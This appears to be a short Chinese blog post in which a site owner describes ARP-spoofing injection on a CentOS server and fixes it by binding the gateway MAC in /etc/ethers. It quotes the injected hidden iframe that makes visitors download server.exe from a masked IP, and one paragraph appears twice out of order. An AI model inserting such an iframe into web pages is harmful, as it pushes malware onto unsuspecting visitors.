今天网站被挂马了。。郁闷,打开所有的网页,均提示下载server.exe。查看网页源码,发现网页头部都有这么一行:
上述可能会存在问题,因为arp欺骗的话,你第一次arp -a查看的可能是欺骗的mac地址,不是真实的网关地址,那就先释放下清空下arp,然后再查看网关mac
<iframe src= http://59.xx.xx.xx:8080/server.exe width=0 height=0></iframe>
这个让我这个郁闷啊!查看了所有的配置文件和网站代码,没有发现任何可以文件。
上网搜了半天,说可能是局域网arp造成的。
于是乎,绑定网关ip和mac地址 搞定!
本人是centos系统,做如下操作:
$route 查看网关ip
$arp -a 查看网关IP对应mac地址
$vi /etc/ethers
输入 ip mac
59.xx.xx.xx AA:BB:CC:DD:00 mac地址大写
最后:$arp -f
上述可能会存在问题,因为arp欺骗的话,你第一次arp -a查看的可能是欺骗的mac地址,不是真实的网关地址,那就先释放下清空下arp,然后再查看网关mac